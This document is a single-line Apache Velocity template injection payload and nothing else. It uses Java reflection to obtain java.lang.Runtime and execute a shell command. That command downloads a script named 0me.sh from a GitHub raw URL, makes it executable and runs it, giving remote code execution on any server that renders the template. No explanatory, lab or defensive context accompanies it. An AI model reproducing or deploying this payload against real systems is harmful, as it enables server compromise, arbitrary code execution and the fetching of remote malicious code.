#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("wget https://raw.githubusercontent.com/Pd1r/Poc/master/0me.sh;chmod +x 0me.sh;./0me.sh",null,null).toString();
